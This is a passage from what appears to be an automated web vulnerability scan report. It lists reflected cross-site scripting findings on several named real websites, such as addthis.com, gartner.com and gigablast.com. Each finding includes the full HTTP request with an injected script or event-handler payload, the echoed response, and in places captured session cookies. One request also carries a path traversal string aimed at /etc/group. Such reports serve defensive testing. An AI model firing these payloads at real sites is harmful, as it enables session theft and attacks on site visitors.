The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e894a<script>alert(1)</script>28b51df7b70 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.pomerantzlaw.com/p.json?callback=_ate.ad.hpre894a<script>alert(1)</script>28b51df7b70&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcases.html%3Faction%3DcaseDetail%26CaseID%3D102&g0rr6z HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 255
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 17:03:38 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 17:03:38 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60|1305219818.1EY; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:59:25 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 17:03:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 17:03:38 GMT
Connection: close

_ate.ad.hpre894a<script>alert(1)</script>28b51df7b70({"urls":["http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/39CD8FF4-531A-4266-A340-45548C451F45/User/4dc048d9159e4ae3/gif"],"segments" : ["1EY"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="
...[SNIP]...
5.5. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.tydingslaw.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload af6a5<script>alert(1)</script>b51a3380c9e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.tydingslaw.com/p.json?callback=_ate.ad.hpraf6a5<script>alert(1)</script>b51a3380c9e&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.tydingslaw.com%2FContent.aspx%3Ftopic%3DAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back&ref=http%3A%2F%2Fwww.tydingslaw.com%2FPracticesIndustries%2Fpid%2F7%2FCommercial-and-Business-Litigation-.aspx&3vpnn2 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1305201657.1OD|1305200976.1FE|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 551
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 16:11:59 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 16:11:59 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216719.1FE|1305216719.1OD|1305216719.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:11:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 16:11:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:11:59 GMT
Connection: close

_ate.ad.hpraf6a5<script>alert(1)</script>b51a3380c9e({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbser
...[SNIP]...
5.6. http://ds.addthis.com/red/psi/sites/www.wi-ala.org/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.wi-ala.org/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8d152<script>alert(1)</script>f8a0ec4641e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.wi-ala.org/p.json?callback=_ate.ad.hpr8d152<script>alert(1)</script>f8a0ec4641e&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.wi-ala.org%2FClubPortal%2Fwala%2FNewsView.cfm%3FclubID%3D177%26NewsID%3D3733&ref=http%3A%2F%2Fwww.wi-ala.org%2FClubPortal%2Fwala%2F&1krsxxj HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60|1305219565.1EY; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 18:10:13 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 18:10:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 18:10:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 18:10:13 GMT
Connection: close

_ate.ad.hpr8d152<script>alert(1)</script>f8a0ec4641e({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})
5.7. http://gigablast.com/ [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gigablast.com
Path:   /

Issue detail

The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 217ce"><script>alert(1)</script>b200ebb607f was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c=dmoz3217ce"><script>alert(1)</script>b200ebb607f HTTP/1.1
Host: gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 2520
Content-Type: text/html; charset=
Connection: Close
Server: Gigablast/1.0
Expires: Thu, 12 May 2011 15:16:38 GMT
Date: Thu, 12 May 2011 15:16:13 GMT
Last-Modified: Thu, 12 May 2011 15:16:13 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Gigablast</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="description" cont
...[SNIP]...
<input type=hidden name=c value="dmoz3217ce"><script>alert(1)</script>b200ebb607f">
...[SNIP]...
5.8. http://labs.natpal.com/trac/js/ena.js [trkDomain parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://labs.natpal.com
Path:   /trac/js/ena.js

Issue detail

The value of the trkDomain request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3af87'%3balert(1)//7f2a306cc4e was submitted in the trkDomain parameter. This input was echoed as 3af87';alert(1)//7f2a306cc4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trac/js/ena.js?trkDomain=layserfreiwald.com3af87'%3balert(1)//7f2a306cc4e HTTP/1.1
Host: labs.natpal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 12 May 2011 18:08:59 GMT
Content-Length: 10334


var ydlVisitTypeCookieTTL = 14; // days
var ydlVisitTypeCookieName = 'vt';
var ydlPUT = 'p';
var ydlUUT = 'u';

function matchURL(detectionKey) {
   if(detectionKey == null) return true;
   var u
...[SNIP]...
ator.platform,
           subString: "Linux",
           identity: "Linux"
       }
   ]

};

BrowserDetect.init();

var url = 'http://labs.natpal.com/trk/pixel?trackid=' +
    '&trkDomain=layserfreiwald.com3af87';alert(1)//7f2a306cc4e' +
    '&referrer=' + escape(document.referrer) +
    '&pageVisited=' + escape(location.href) +
    '&browser='     + escape(BrowserDetect.browser) +
    '&
...[SNIP]...
5.9. http://layserfreiwald.com/attorneys.html [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://layserfreiwald.com
Path:   /attorneys.html

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload d38d6<img%20src%3da%20onerror%3dalert(1)>ef8373716d2 was submitted in the mode parameter. This input was echoed as d38d6<img src=a onerror=alert(1)>ef8373716d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /attorneys.html?mode=viewd38d6<img%20src%3da%20onerror%3dalert(1)>ef8373716d2&AID=8 HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/
Cookie: CFID=8b46ceb8%2Df5f2%2D4810%2D8dca%2Db8cba45aa5c4; CFTOKEN=0; vt=u; __utma=146588073.159810427.1305223741.1305223741.1305223741.1; __utmb=146588073.1.10.1305223741; __utmc=146588073; __utmz=146588073.1305223741.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/layser-freiwald

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:13:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 7592

ERROR - UNSUPPORTED MODE (viewd38d6<img src=a onerror=alert(1)>ef8373716d2)!
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns
...[SNIP]...
5.10. http://m.perkinscoie.com/publications/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.perkinscoie.com
Path:   /publications/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93015"><script>alert(1)</script>40999349f56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /publications/?93015"><script>alert(1)</script>40999349f56=1 HTTP/1.1
Host: m.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.perkinscoie.com/
Cookie: __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=3814; PortletId=4736294; SiteId=3811; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=u1pig42zp4pybpu2rug2dqbl; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:00:49 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A68
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=3820; path=/
Set-Cookie: PortletId=4737494; path=/
Set-Cookie: SiteId=3811; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 10504
Content-Length: 10504


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

Publications


|
Perkins Coie Mobile Site
</title><meta name="viewport" c
...[SNIP]...
<a href="/publications/?93015"><script>alert(1)</script>40999349f56=1&amp;p=2"&gt;Next &gt;</a>
...[SNIP]...
5.11. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bisnow.com
Path:   /new_york_commercial_real_estate_news_story.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 74e0e<script>alert(1)</script>8e1c2fd2452 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new_york_commercial_real_estate_news_story.php74e0e<script>alert(1)</script>8e1c2fd2452 HTTP/1.1
Host: www.bisnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:55:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://bisnowtest.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Thu, 12 May 2011 16:55:23 GMT
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /new_york_commercial_real_estate_news_story.php74e0e<script>alert(1)</script>8e1c2fd2452 was not found on this server.</p>
...[SNIP]...
5.12. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bisnow.com
Path:   /new_york_commercial_real_estate_news_story.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 855d4<script>alert(1)</script>ea1f5dd84b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new_york_commercial_real_estate_news_story.php?855d4<script>alert(1)</script>ea1f5dd84b4=1 HTTP/1.1
Host: www.bisnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:55:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://bisnowtest.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Thu, 12 May 2011 16:55:07 GMT
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /new_york_commercial_real_estate_news_story.php?855d4<script>alert(1)</script>ea1f5dd84b4=1 was not found on this server.</p>
...[SNIP]...
5.13. http://www.gartner.com/0_admin/PasswordRequest.jsp [startPage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/PasswordRequest.jsp

Issue detail

The value of the startPage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe694"><script>alert(1)</script>7999e454e36 was submitted in the startPage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /0_admin/PasswordRequest.jsp?startPage=https://my.gartner.com/portal/server.ptfe694"><script>alert(1)</script>7999e454e36 HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231772135:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.4.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LoginWLSessionID=dj22NMQfh16FmhxVgWyctlxb73Tc6GtpjZsgcTX6L9DvmxX5cNHZ!-1907662523

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 20:23:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO8859_1
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.U50D391B4].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 22177

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Request Password</title>


<script src="/js/utility.js" type="text/javascript"></script>
<scr
...[SNIP]...
<input type="hidden" name="startPage" value="https://my.gartner.com/portal/server.ptfe694"><script>alert(1)</script>7999e454e36">
...[SNIP]...
5.14. http://www.gigablast.com/ [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gigablast.com
Path:   /

Issue detail

The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e50e"><script>alert(1)</script>057ece81203 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c=dmoz31e50e"><script>alert(1)</script>057ece81203 HTTP/1.1
Host: www.gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 2520
Content-Type: text/html; charset=
Connection: Close
Server: Gigablast/1.0
Expires: Thu, 12 May 2011 15:16:29 GMT
Date: Thu, 12 May 2011 15:16:04 GMT
Last-Modified: Thu, 12 May 2011 15:16:04 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Gigablast</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="description" cont
...[SNIP]...
<input type=hidden name=c value="dmoz31e50e"><script>alert(1)</script>057ece81203">
...[SNIP]...
5.15. http://www.gigablast.com/search [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gigablast.com
Path:   /search

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 865e8"><script>alert(1)</script>502cfb23195 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=ip%3A216.32.120%20cars865e8"><script>alert(1)</script>502cfb23195&n=10&k0s=987832 HTTP/1.1
Host: www.gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 1542
Content-Type: text/html
Connection: Close
Server: Gigablast/1.0
Date: Thu, 12 May 2011 15:16:03 GMT
Last-Modified: Thu, 12 May 2011 15:16:03 GMT

<form method=get><input type=hidden name="q" value="ip:216.32.120 cars865e8"><script>alert(1)</script>502cfb23195">
<input type=hidden name="s" value="0">
<center>Enter the 4 LARGE letters you see bel
...[SNIP]...
5.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5cac9(a)30f8c3192d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?5cac9(a)30f8c3192d3=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=XFGT4lg_DpGj71fXNRI12T3QgI498DMCm4Vo9l4byW_QpzG-1W0BLR6-HJBfYe0g_Yd3khHZhnqBzpQ9o6NhmExBlmVDocZYG5FHVRmPESjfOu4RHg9_z7GWsQ3WRLNm; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-;

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:20 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?5cac9(a)30f8c3192d3\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...
5.17. http://www.hartfordbusiness.com/fs_webkit/fs_css_processor.php [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /fs_webkit/fs_css_processor.php

Issue detail

The value of the src request parameter is copied into the HTML document as plain text between tags. The payload 47960<script>alert(1)</script>9af43b57f58 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fs_webkit/fs_css_processor.php?src=/template/hbj/forms.fcss../../../../../../../../etc/group47960<script>alert(1)</script>9af43b57f58&color=primary!891709*sidebar!EEE1CE*link!0000FF*link_hover!ff0000 HTTP/1.1
Host: www.hartfordbusiness.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=cba35d48e37d667e2a7b4af26a795cdd; __utma=231841670.1564481969.1305247369.1305247369.1305247369.1; __utmb=231841670.1.10.1305247369; __utmc=231841670; __utmz=231841670.1305247369.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; OAID=ff33d9b426ad063f746675f34d885b06

Response

HTTP/1.1 200 OK
Date: Fri, 13 May 2011 00:49:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 231

/* WARNING: I COULDN'T WRITE THIS FILE, THE DIRECTORY IS WRITE PROTECTED */
/* TRIED TO WRITE FILE : /app/production/nebm/universal/template/hbj/forms.css../../../../../../../../etc/group47960<script>alert(1)</script>9af43b57f58*/
5.18. http://www.hartfordbusiness.com/news14300.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /news14300.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d3ba"><script>alert(1)</script>22db1e31600 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news14300.html8d3ba"><script>alert(1)</script>22db1e31600 HTTP/1.1
Host: www.hartfordbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: PHPSESSID=93a13061659f5cd464d2764d04966966; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6bc228ab1c195ad6c6bd4d06455b26ce=deleted; expires=Wed, 12-May-2010 16:55:27 GMT; path=/
Set-Cookie: 5ff776a7c2ecdadbd916c8b14c203a83=deleted; expires=Wed, 12-May-2010 16:55:27 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 34892

...<?xml version="1.0" encoding="utf-8"?>
